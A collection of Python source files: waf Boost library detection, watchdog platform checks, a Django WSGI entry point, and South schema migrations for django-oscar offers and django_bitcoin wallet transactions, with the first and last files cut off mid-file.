'sun': 'sw',
'sunc++': 'sw',
'tru64cxx': 'tru',
'vacpp': 'xlc'
}
def options(opt):
opt = opt.add_option_group('Boost Options')
opt.add_option('--boost-includes', type='string',
default='', dest='boost_includes',
help='''path to the directory where the boost includes are, e.g., /path/to/boost_1_55_0/stage/include''')
opt.add_option('--boost-libs', type='string',
default='', dest='boost_libs',
help='''path to the directory where the boost libs are, e.g., /path/to/boost_1_55_0/stage/lib''')
opt.add_option('--boost-static', action='store_true',
default=False, dest='boost_static',
help='link with static boost libraries (.lib/.a)')
opt.add_option('--boost-mt', action='store_true',
default=False, dest='boost_mt',
help='select multi-threaded libraries')
opt.add_option('--boost-abi', type='string', default='', dest='boost_abi',
help='''select libraries with tags (dgsyp, d for debug), see doc Boost, Getting Started, chapter 6.1''')
opt.add_option('--boost-linkage_autodetect', action="store_true", dest='boost_linkage_autodetect',
help="auto-detect boost linkage options (don't get used to it / might break other stuff)")
opt.add_option('--boost-toolset', type='string',
default='', dest='boost_toolset',
help='force a toolset e.g. msvc, vc90, gcc, mingw, mgw45 (default: auto)')
py_version = '%d%d' % (sys.version_info[0], sys.version_info[1])
opt.add_option('--boost-python', type='string',
default=py_version, dest='boost_python',
help='select the lib python with this version (default: %s)' % py_version)
@conf
def __boost_get_version_file(self, d):
dnode = self.root.find_dir(d)
if dnode:
return dnode.find_node(BOOST_VERSION_FILE)
return None
@conf
def boost_get_version(self, d):
"""silently retrieve the boost version number"""
node = self.__boost_get_version_file(d)
if node:
try:
txt = node.read()
except (OSError, IOError):
Logs.error("Could not read the file %r" % node.abspath())
else:
re_but1 = re.compile('^#define\\s+BOOST_LIB_VERSION\\s+"(.+)"', re.M)
m1 = re_but1.search(txt)
re_but2 = re.compile('^#define\\s+BOOST_VERSION\\s+(\\d+)', re.M)
m2 = re_but2.search(txt)
if m1 and m2:
return (m1.group(1), m2.group(1))
return self.check_cxx(fragment=BOOST_VERSION_CODE, includes=[d], execute=True, define_ret=True).split(":")
@conf
def boost_get_includes(self, *k, **kw):
includes = k and k[0] or kw.get('includes', None)
if includes and self.__boost_get_version_file(includes):
return includes
for d in Utils.to_list(self.environ.get('INCLUDE', '')) + BOOST_INCLUDES:
if self.__boost_get_version_file(d):
return d
if includes:
self.end_msg('headers not found in %s' % includes)
self.fatal('The configuration failed')
else:
self.end_msg('headers not found, please provide a --boost-includes argument (see help)')
self.fatal('The configuration failed')
@conf
def boost_get_toolset(self, cc):
toolset = cc
if not cc:
build_platform = Utils.unversioned_sys_platform()
if build_platform in BOOST_TOOLSETS:
cc = build_platform
else:
cc = self.env.CXX_NAME
if cc in BOOST_TOOLSETS:
toolset = BOOST_TOOLSETS[cc]
return isinstance(toolset, str) and toolset or toolset(self.env)
@conf
def __boost_get_libs_path(self, *k, **kw):
''' return the lib path and all the files in it '''
if 'files' in kw:
return self.root.find_dir('.'), Utils.to_list(kw['files'])
libs = k and k[0] or kw.get('libs', None)
if libs:
path = self.root.find_dir(libs)
files = path.ant_glob('*boost_*')
if not libs or not files:
for d in Utils.to_list(self.environ.get('LIB', [])) + BOOST_LIBS:
path = self.root.find_dir(d)
if path:
files = path.ant_glob('*boost_*')
if files:
break
path = self.root.find_dir(d + '64')
if path:
files = path.ant_glob('*boost_*')
if files:
break
if not path:
if libs:
self.end_msg('libs not found in %s' % libs)
self.fatal('The configuration failed')
else:
self.end_msg('libs not found, please provide a --boost-libs argument (see help)')
self.fatal('The configuration failed')
self.to_log('Found the boost path in %r with the libraries:' % path)
for x in files:
self.to_log(' %r' % x)
return path, files
@conf
def boost_get_libs(self, *k, **kw):
'''
return the lib path and the required libs
according to the parameters
'''
path, files = self.__boost_get_libs_path(**kw)
t = []
if kw.get('mt', False):
t.append('mt')
if kw.get('abi', None):
t.append(kw['abi'])
tags = t and '(-%s)+' % '-'.join(t) or ''
toolset = self.boost_get_toolset(kw.get('toolset', ''))
toolset_pat = '(-%s[0-9]{0,3})+' % toolset
version = '(-%s)+' % self.env.BOOST_VERSION
def find_lib(re_lib, files):
for file in files:
if re_lib.search(file.name):
self.to_log('Found boost lib %s' % file)
return file
return None
def format_lib_name(name):
if name.startswith('lib') and self.env.CC_NAME != 'msvc':
name = name[3:]
return name[:name.rfind('.')]
libs = []
for lib in Utils.to_list(k and k[0] or kw.get('lib', None)):
py = (lib == 'python') and '(-py%s)+' % kw['python'] or ''
# Trying libraries, from most strict match to least one
for pattern in ['boost_%s%s%s%s%s' % (lib, toolset_pat, tags, py, version),
'boost_%s%s%s%s' % (lib, tags, py, version),
'boost_%s%s%s' % (lib, tags, version),
# Give up trying to find the right version
'boost_%s%s%s%s' % (lib, toolset_pat, tags, py),
'boost_%s%s%s' % (lib, tags, py),
'boost_%s%s' % (lib, tags)]:
self.to_log('Trying pattern %s' % pattern)
file = find_lib(re.compile(pattern), files)
if file:
libs.append(format_lib_name(file.name))
break
else:
self.end_msg('lib %s not found in %s' % (lib, path.abspath()))
self.fatal('The configuration failed')
return path.abspath(), libs
@conf
def check_boost(self, *k, **kw):
"""
Initialize boost libraries to be used.
Keywords: you can pass the same parameters as with the command line (without "--boost-").
Note that the command line has the priority, and should preferably be used.
"""
if not self.env['CXX']:
self.fatal('load a c++ compiler first, conf.load("compiler_cxx")')
params = {'lib': k and k[0] or kw.get('lib', None)}
for key, value in self.options.__dict__.items():
if not key.startswith('boost_'):
continue
key = key[len('boost_'):]
params[key] = value and value or kw.get(key, '')
var = kw.get('uselib_store', 'BOOST')
self.start_msg('Checking boost includes')
self.env['INCLUDES_%s' % var] = inc = self.boost_get_includes(**params)
versions = self.boost_get_version(inc)
self.env.BOOST_VERSION = versions[0]
self.env.BOOST_VERSION_NUMBER = int(versions[1])
self.end_msg("%d.%d.%d" % (int(versions[1]) / 100000,
int(versions[1]) / 100 % 1000,
int(versions[1]) % 100))
if Logs.verbose:
Logs.pprint('CYAN', ' path : %s' % self.env['INCLUDES_%s' % var])
if not params['lib']:
return
self.start_msg('Checking boost libs')
suffix = params.get('static', None) and 'ST' or ''
path, libs = self.boost_get_libs(**params)
self.env['%sLIBPATH_%s' % (suffix, var)] = [path]
self.env['%sLIB_%s' % (suffix, var)] = libs
self.end_msg('ok')
if Logs.verbose:
Logs.pprint('CYAN', ' path : %s' % path)
Logs.pprint('CYAN', ' libs : %s' % libs)
def try_link():
if 'system' in params['lib']:
self.check_cxx(
fragment=BOOST_SYSTEM_CODE,
use=var,
execute=False,
)
if 'thread' in params['lib']:
self.check_cxx(
fragment=BOOST_THREAD_CODE,
use=var,
execute=False,
)
if params.get('linkage_autodetect', False):
self.start_msg("Attempting to detect boost linkage flags")
toolset = self.boost_get_toolset(kw.get('toolset', ''))
if toolset in ['vc']:
# disable auto-linking feature, causing error LNK1181
# because the code wants to be linked against
self.env['DEFINES_%s' % var] += ['BOOST_ALL_NO_LIB']
# if no dlls are present, we guess the .lib files are not stubs
has_dlls = False
for x in Utils.listdir(path):
if x.endswith(self.env.cxxshlib_PATTERN % ''):
has_dlls = True
break
if not has_dlls:
self.env['STLIBPATH_%s' % var] = [path]
self.env['STLIB_%s' % var] = libs
del self.env['LIB_%s' % var]
del self.env['LIBPATH_%s' % var]
# we attempt to play with some known-to-work CXXFLAGS combinations
for cxxflags in (['/MD', '/EHsc'], []):
self.env.stash()
self.env["CXXFLAGS_%s" % var] += cxxflags
try:
try_link()
self.end_msg("ok: winning cxxflags combination: %s" % (self.env["CXXFLAGS_%s" % var]))
e = None
break
except Errors.ConfigurationError as exc:
self.env.revert()
e = exc
if e is not None:
self.end_msg("Could not auto-detect boost linking flags combination, you may report it to boost.py author", ex=e)
self.fatal('The configuration failed')
else:
self.end_msg("Boost linkage flags auto-detection not implemented (needed ?) for this toolchain")
self.fatal('The configuration failed')
else:
self.start_msg('Checking for boost linkage')
try:
try_link()
except Errors.ConfigurationError as e:
self.end_msg("Could not link against boost libraries using supplied options")
self.fatal('The configuration failed')
self.end_msg('ok')
|
spirosmastorakis/ndn-tools
|
.waf-tools/boost.py
|
Python
|
gpl-3.0
| 14,617
|
# coding: utf-8
#
# Copyright 2011 Yesudeep Mangalapilly <yesudeep@gmail.com>
# Copyright 2012 Google, Inc & contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
PLATFORM_WINDOWS = 'windows'
PLATFORM_LINUX = 'linux'
PLATFORM_BSD = 'bsd'
PLATFORM_DARWIN = 'darwin'
PLATFORM_UNKNOWN = 'unknown'
def get_platform_name():
if sys.platform.startswith("win"):
return PLATFORM_WINDOWS
elif sys.platform.startswith('darwin'):
return PLATFORM_DARWIN
elif sys.platform.startswith('linux'):
return PLATFORM_LINUX
elif sys.platform.startswith(('dragonfly', 'freebsd', 'netbsd', 'openbsd', 'bsd')):
return PLATFORM_BSD
else:
return PLATFORM_UNKNOWN
__platform__ = get_platform_name()
def is_linux():
return __platform__ == PLATFORM_LINUX
def is_bsd():
return __platform__ == PLATFORM_BSD
def is_darwin():
return __platform__ == PLATFORM_DARWIN
def is_windows():
return __platform__ == PLATFORM_WINDOWS
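# Illustrative self-test (editor's addition, not part of the original module):
# running the file directly reports which platform branch was selected. The
# observer names are the ones watchdog conventionally uses per platform.
if __name__ == '__main__':
    if is_windows():
        print('windows: a ReadDirectoryChangesW-based observer would be used')
    elif is_darwin():
        print('darwin: an FSEvents-based observer would be used')
    elif is_linux():
        print('linux: an inotify-based observer would be used')
    elif is_bsd():
        print('bsd: a kqueue-based observer would be used')
    else:
        print('unknown platform: falling back to polling')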
|
snakeleon/YouCompleteMe-x64
|
third_party/ycmd/third_party/watchdog_deps/watchdog/src/watchdog/utils/platform.py
|
Python
|
gpl-3.0
| 1,497
|
"""
WSGI config for kaka project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "kaka.settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
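# Example deployment commands (editor's note; the server choice is an
# assumption, not part of this file):
#   gunicorn kaka.wsgi:application --bind 0.0.0.0:8000
#   uwsgi --module kaka.wsgi:application --http :8000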
|
hdzierz/Kaka
|
kaka/wsgi.py
|
Python
|
gpl-2.0
| 383
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
db.rename_column('offer_conditionaloffer', 'start_date', 'start_datetime')
db.rename_column('offer_conditionaloffer', 'end_date', 'end_datetime')
def backwards(self, orm):
db.rename_column('offer_conditionaloffer', 'start_datetime', 'start_date')
db.rename_column('offer_conditionaloffer', 'end_datetime', 'end_date')
models = {
'catalogue.attributeentity': {
'Meta': {'object_name': 'AttributeEntity'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entities'", 'to': "orm['catalogue.AttributeEntityType']"})
},
'catalogue.attributeentitytype': {
'Meta': {'object_name': 'AttributeEntityType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'})
},
'catalogue.attributeoption': {
'Meta': {'object_name': 'AttributeOption'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'options'", 'to': "orm['catalogue.AttributeOptionGroup']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'option': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'catalogue.attributeoptiongroup': {
'Meta': {'object_name': 'AttributeOptionGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'catalogue.category': {
'Meta': {'ordering': "['full_name']", 'object_name': 'Category'},
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'})
},
'catalogue.option': {
'Meta': {'object_name': 'Option'},
'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'Required'", 'max_length': '128'})
},
'catalogue.product': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'Product'},
'attributes': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.ProductAttribute']", 'through': "orm['catalogue.ProductAttributeValue']", 'symmetrical': 'False'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Category']", 'through': "orm['catalogue.ProductCategory']", 'symmetrical': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_discountable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'variants'", 'null': 'True', 'to': "orm['catalogue.Product']"}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductClass']", 'null': 'True'}),
'product_options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'recommended_products': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Product']", 'symmetrical': 'False', 'through': "orm['catalogue.ProductRecommendation']", 'blank': 'True'}),
'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'relations'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'score': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'status': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'upc': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'catalogue.productattribute': {
'Meta': {'ordering': "['code']", 'object_name': 'ProductAttribute'},
'code': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'entity_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntityType']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'option_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOptionGroup']", 'null': 'True', 'blank': 'True'}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'attributes'", 'null': 'True', 'to': "orm['catalogue.ProductClass']"}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '20'})
},
'catalogue.productattributevalue': {
'Meta': {'object_name': 'ProductAttributeValue'},
'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductAttribute']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attribute_values'", 'to': "orm['catalogue.Product']"}),
'value_boolean': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'value_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'value_entity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntity']", 'null': 'True', 'blank': 'True'}),
'value_float': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'value_integer': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'value_option': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOption']", 'null': 'True', 'blank': 'True'}),
'value_richtext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'value_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'catalogue.productcategory': {
'Meta': {'ordering': "['-is_canonical']", 'object_name': 'ProductCategory'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_canonical': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'catalogue.productclass': {
'Meta': {'ordering': "['name']", 'object_name': 'ProductClass'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'requires_shipping': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
'track_stock': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'catalogue.productrecommendation': {
'Meta': {'object_name': 'ProductRecommendation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'primary': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_recommendations'", 'to': "orm['catalogue.Product']"}),
'ranking': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'recommendation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'offer.benefit': {
'Meta': {'object_name': 'Benefit'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_affected_items': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
'offer.condition': {
'Meta': {'object_name': 'Condition'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
'offer.conditionaloffer': {
'Meta': {'ordering': "['-priority']", 'object_name': 'ConditionalOffer'},
'benefit': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Benefit']"}),
'condition': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Condition']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'end_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_basket_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_discount': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'max_global_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_user_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'num_applications': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'num_orders': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'offer_type': ('django.db.models.fields.CharField', [], {'default': "'Site'", 'max_length': '128'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'redirect_url': ('oscar.models.fields.ExtendedURLField', [], {'max_length': '200', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'unique': 'True', 'null': 'True'}),
'start_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Open'", 'max_length': '64'}),
'total_discount': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'offer.range': {
'Meta': {'object_name': 'Range'},
'classes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'classes'", 'blank': 'True', 'to': "orm['catalogue.ProductClass']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'excluded_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'excludes'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'included_categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'to': "orm['catalogue.Category']"}),
'included_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'includes_all_products': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'offer.shippingbenefit': {
'Meta': {'object_name': 'ShippingBenefit', '_ormbases': ['offer.Benefit']},
'benefit_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['offer.Benefit']", 'unique': 'True', 'primary_key': 'True'})
}
}
complete_apps = ['offer']
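# Editor's note: with South installed, a schema migration like this one is
# applied with the standard management command, e.g.:
#   python manage.py migrate offer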
|
jinnykoo/wuyisj
|
src/oscar/apps/offer/south_migrations/0018_auto__del_field_conditionaloffer_end_date__del_field_conditionaloffer_.py
|
Python
|
bsd-3-clause
| 16,241
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'DepositTransaction.confirmations'
db.add_column('django_bitcoin_deposittransaction', 'confirmations',
self.gf('django.db.models.fields.IntegerField')(default=0),
keep_default=False)
# Adding field 'DepositTransaction.txid'
db.add_column('django_bitcoin_deposittransaction', 'txid',
self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True),
keep_default=False)
# Adding field 'WalletTransaction.txid'
db.add_column('django_bitcoin_wallettransaction', 'txid',
self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'DepositTransaction.confirmations'
db.delete_column('django_bitcoin_deposittransaction', 'confirmations')
# Deleting field 'DepositTransaction.txid'
db.delete_column('django_bitcoin_deposittransaction', 'txid')
# Deleting field 'WalletTransaction.txid'
db.delete_column('django_bitcoin_wallettransaction', 'txid')
models = {
'django_bitcoin.bitcoinaddress': {
'Meta': {'object_name': 'BitcoinAddress'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'address': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '50', 'null': 'True', 'blank': 'True'}),
'least_received': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '16', 'decimal_places': '8'}),
'least_received_confirmed': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '16', 'decimal_places': '8'}),
'wallet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'addresses'", 'null': 'True', 'to': "orm['django_bitcoin.Wallet']"})
},
'django_bitcoin.deposittransaction': {
'Meta': {'object_name': 'DepositTransaction'},
'address': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['django_bitcoin.BitcoinAddress']"}),
'amount': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '16', 'decimal_places': '8'}),
'confirmations': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'txid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'wallet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['django_bitcoin.Wallet']"})
},
'django_bitcoin.historicalprice': {
'Meta': {'object_name': 'HistoricalPrice'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'params': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '2'})
},
'django_bitcoin.payment': {
'Meta': {'object_name': 'Payment'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'amount': ('django.db.models.fields.DecimalField', [], {'default': "'0.0'", 'max_digits': '16', 'decimal_places': '8'}),
'amount_paid': ('django.db.models.fields.DecimalField', [], {'default': "'0.0'", 'max_digits': '16', 'decimal_places': '8'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'paid_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'transactions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['django_bitcoin.Transaction']", 'symmetrical': 'False'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {}),
'withdrawn_total': ('django.db.models.fields.DecimalField', [], {'default': "'0.0'", 'max_digits': '16', 'decimal_places': '8'})
},
'django_bitcoin.transaction': {
'Meta': {'object_name': 'Transaction'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'amount': ('django.db.models.fields.DecimalField', [], {'default': "'0.0'", 'max_digits': '16', 'decimal_places': '8'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'django_bitcoin.wallet': {
'Meta': {'object_name': 'Wallet'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'last_balance': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '16', 'decimal_places': '8'}),
'transaction_counter': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'transactions_with': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['django_bitcoin.Wallet']", 'through': "orm['django_bitcoin.WalletTransaction']", 'symmetrical': 'False'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
'django_bitcoin.wallettransaction': {
'Meta': {'object_name': 'WalletTransaction'},
'amount': ('django.db.models.fields.DecimalField', [], {'default': "'0.0'", 'max_digits': '16', 'decimal_places': '8'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
